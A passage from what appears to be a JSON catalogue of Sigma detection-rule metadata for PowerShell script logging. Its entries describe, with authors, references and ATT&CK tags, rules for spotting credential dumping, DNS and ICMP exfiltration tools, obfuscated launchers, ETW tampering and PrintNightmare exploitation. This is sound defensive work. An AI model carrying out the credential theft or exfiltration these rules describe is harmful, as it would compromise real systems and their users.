database in order to steal credential information", - "meta": { - "author": "frack113", - "creation_date": "2022/01/12", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_create_volume_shadow_copy.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://attack.mitre.org/datasources/DS0005/", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ] - }, - "uuid": "afd12fed-b0ec-45c9-a13d-aa86625dac81", - "value": "Create Volume Shadow Copy with Powershell" - }, - { - "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2019/10/21", - "falsepositive": [ - "Highly likely if archive operations are done via PowerShell." - ], - "filename": "posh_ps_data_compressed.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560/T1560.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_data_compressed.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1560" - ] - }, - "uuid": "6dc5d284-69ea-42cf-9311-fb1c3932a69a", - "value": "Data Compressed - PowerShell" - }, - { - "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n", - "meta": { - "author": "frack113, Duc.Le-GTSC", - "creation_date": "2021/08/03", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_detect_vm_env.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md", - 
"https://techgenix.com/malicious-powershell-scripts-evade-detection/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1497.001" - ] - }, - "uuid": "d93129cd-1ee0-479f-bc03-ca6f129882e3", - "value": "Powershell Detect Virtualization Environment" - }, - { - "description": "Enumerates Active Directory to determine computers that are joined to the domain", - "meta": { - "author": "frack113", - "creation_date": "2022/02/12", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_directorysearcher.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directorysearcher.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1018" - ] - }, - "uuid": "1f6399cf-2c80-4924-ace1-6fcff3393480", - "value": "DirectorySearcher Powershell Exploitation" - }, - { - "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/28", - "falsepositive": [ - "Legitimate administrative script" - ], - "filename": "posh_ps_directoryservices_accountmanagement.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell", - "https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136.002" - ] - }, - "uuid": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", - "value": "Manipulation of User Computer or Group Security Principals Across AD" - }, - { - "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", - "meta": { - "author": "Ali Alwashali", - "creation_date": "2022/08/21", - "falsepositive": [ - "Legitimate script that disables the command history" - ], - "filename": "posh_ps_disable_psreadline_command_history.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/DissectMalware/status/1062879286749773824", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.003" - ] - }, - "uuid": "602f5669-6927-4688-84db-0d4b7afb2150", - "value": "Disable Powershell Command History" - }, - { - "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "meta": { - "author": "frack113", - "creation_date": "2022/09/10", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_disable_windowsoptionalfeature.yml", - "level": "high", - "logsource.category": "ps_script", - 
"logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md", - "https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "99c4658d-2c5e-4d87-828d-7c066ca537c3", - "value": "Disable-WindowsOptionalFeature Command PowerShell" - }, - { - "description": "Dnscat exfiltration tool execution", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" - ], - "filename": "posh_ps_dnscat_execution.yml", - "level": "critical", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dnscat_execution.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "a6d67db4-6220-436d-8afc-f3842fe05d43", - "value": "Dnscat Execution" - }, - { - "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/20", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_dump_password_windows_credential_manager.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555" - ] - }, - "uuid": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", - "value": "Dump Credentials from Windows Credential Manager With PowerShell" - }, - { - "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", - "meta": { - "author": "frack113", - "creation_date": "2022/01/07", - "falsepositive": [ - "Legitimate script" - ], - "filename": "posh_ps_enable_psremoting.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_psremoting.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.006" - ] - }, - "uuid": "991a9744-f2f0-44f2-bd33-9092eba17dc3", - "value": "Enable Windows Remote Management" - }, - { - "description": "Detect built in PowerShell cmdlet Enable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "meta": { - "author": "frack113", - "creation_date": "2022/09/10", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_enable_windowsoptionalfeature.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - 
"https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "55c925c1-7195-426b-a136-a9396800e29b", - "value": "Enable-WindowsOptionalFeature Command PowerShell" - }, - { - "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/20", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_enumerate_password_windows_credential_manager.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555" - ] - }, - "uuid": "603c6630-5225-49c1-8047-26c964553e0e", - "value": "Enumerate Credentials from Windows Credential Manager With PowerShell" - }, - { - "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/28", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_etw_trace_evasion.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_etw_trace_evasion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" - ] - }, - "uuid": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", - "value": "Disable of ETW Trace - Powershell" - }, - { - "description": "Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/26", - "falsepositive": [ - "Legitimate usage of the cmdlet to forward emails" - ], - "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml" - ], - "tags": [ - "attack.exfiltration" - ] - }, - "uuid": "15b7abbb-8b40-4d01-9ee2-b51994b1d474", - "value": "Suspicious PowerShell Mailbox SMTP Forward Rule" - }, - { - "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.\nAdversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors,\nincluding whether or not the adversary fully infects the target and/or attempts specific actions.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/15", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_file_and_directory_discovery.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_file_and_directory_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083" - ] - }, - "uuid": "d23f2ba5-9da0-4463-8908-8ee47f614bb9", - "value": "Powershell File and Directory Discovery" - }, - { - "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/30", - "falsepositive": [ - "Legitimate administrative script" - ], - "filename": "posh_ps_get_acl_service.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_acl_service.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1574.011" - ] - }, - "uuid": "95afc12e-3cbb-40c3-9340-84a032e596a3", - "value": "Service Registry Permissions Weakness Check" - }, - { - "description": "Detects usage of the \"Get-AdComputer\" to enumerate Computers within Active Directory.", - "meta": { - "author": "frack113", - "creation_date": "2022/03/17", - "falsepositive": [ - "Unknown" - ], - "filename": 
"posh_ps_get_adcomputer.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adcomputer.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1018" - ] - }, - "uuid": "36bed6b2-e9a0-4fff-beeb-413a92b86138", - "value": "Active Directory Computers Enumeration with Get-AdComputer" - }, - { - "description": "Detects usage of the \"Get-AdGroup\" cmdlet to enumerate Groups within Active Directory", - "meta": { - "author": "frack113", - "creation_date": "2022/03/17", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_get_adgroup.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adgroup.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.002" - ] - }, - "uuid": "8c3a6607-b7dc-4f0d-a646-ef38c00b76ee", - "value": "Active Directory Group Enumeration With Get-AdGroup" - }, - { - "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", - "meta": { - "author": "frack113", - "creation_date": "2022/02/06", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_get_adreplaccount.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://www.powershellgallery.com/packages/DSInternals", - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adreplaccount.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.006" - ] - }, - "uuid": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", - "value": "Suspicious Get-ADReplAccount" - }, - { - "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/13", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_get_childitem_bookmarks.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1217" - ] - }, - "uuid": "e0565f5d-d420-4e02-8a68-ac00d864f9cf", - "value": "Automated Collection Bookmarks Using Get-ChildItem PowerShell" - }, - { - "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/21", - "falsepositive": [ - "Legitimate administration scripts" - ], - "filename": "posh_ps_hotfix_enum.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - 
"https://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hotfix_enum.yml" - ], - "tags": [ - "attack.discovery" - ] - }, - "uuid": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c", - "value": "PowerShell Hotfix Enumeration" - }, - { - "description": "Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", - "meta": { - "author": "Bartlomiej Czyz @bczyz1, oscd.community", - "creation_date": "2020/10/10", - "falsepositive": [ - "Legitimate usage of System.Net.NetworkInformation.Ping class" - ], - "filename": "posh_ps_icmp_exfiltration.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-2---exfiltration-over-alternative-protocol---icmp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_icmp_exfiltration.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ] - }, - "uuid": "4c4af3cd-2115-479c-8193-6b8bfce9001c", - "value": "PowerShell ICMP Exfiltration" - }, - { - "description": "Detects powershell scripts that import modules from suspicious directories", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/07", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_import_module_susp_dirs.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", - "value": "Import PowerShell Modules From Suspicious Directories" - }, - { - "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", - "meta": { - "author": "frack113", - "creation_date": "2022/01/07", - "falsepositive": [ - "Legitimate script" - ], - "filename": "posh_ps_invoke_command_remote.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-2---invoke-command", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_command_remote.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.006" - ] - }, - "uuid": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", - "value": "Execute Invoke-command on Remote Host" - }, - { - "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", - "meta": { - "author": "frack113", - "creation_date": "2022/01/07", - "falsepositive": [ - "Legitimate script" - ], - "filename": "posh_ps_invoke_dnsexfiltration.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh", - "https://github.com/Arno0x/DNSExfiltrator", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048" - ] - }, - "uuid": "d59d7842-9a21-4bc6-ba98-64bfe0091355", - "value": "Powershell DNSExfiltration" - }, - { - "description": "Detects Commandlet name for PrintNightmare exploitation.", - "meta": { - "author": "Max Altgelt, Tobias Michalski", - "creation_date": "2021/08/09", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_invoke_nightmare.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/calebstewart/CVE-2021-1675", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_nightmare.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ] - }, - "uuid": "6d3f1399-a81c-4409-aff3-1ecfe9330baf", - "value": "PrintNightmare Powershell Exploitation" - }, - { - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_invoke_obfuscation_clip.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "73e67340-0d25-11eb-adc1-0242ac120002", - "value": "Invoke-Obfuscation CLIP+ Launcher - PowerShell" - }, - { - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", - "meta": { - "author": "Daniel Bohannon 
(@Mandiant/@FireEye), oscd.community", - "creation_date": "2019/11/08", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", - "value": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell" - }, - { - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_invoke_obfuscation_stdin.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "779c8c12-0eb1-11eb-adc1-0242ac120002", - "value": "Invoke-Obfuscation STDIN+ Launcher - Powershell" - }, - { - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_invoke_obfuscation_var.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - 
"https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "0adfbc14-0ed1-11eb-adc1-0242ac120002", - "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell" - }, - { - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_invoke_obfuscation_via_compress.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", - "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell" - }, - { - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_invoke_obfuscation_via_rundll.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", - "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell" - }, - { - 
"description": "Detects Obfuscated Powershell via Stdin in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/12", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_invoke_obfuscation_via_stdin.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", - "value": "Invoke-Obfuscation Via Stdin - Powershell" - }, - { - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/09", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", - "value": "Invoke-Obfuscation Via Use Clip - Powershell" - }, - { - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/08", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - 
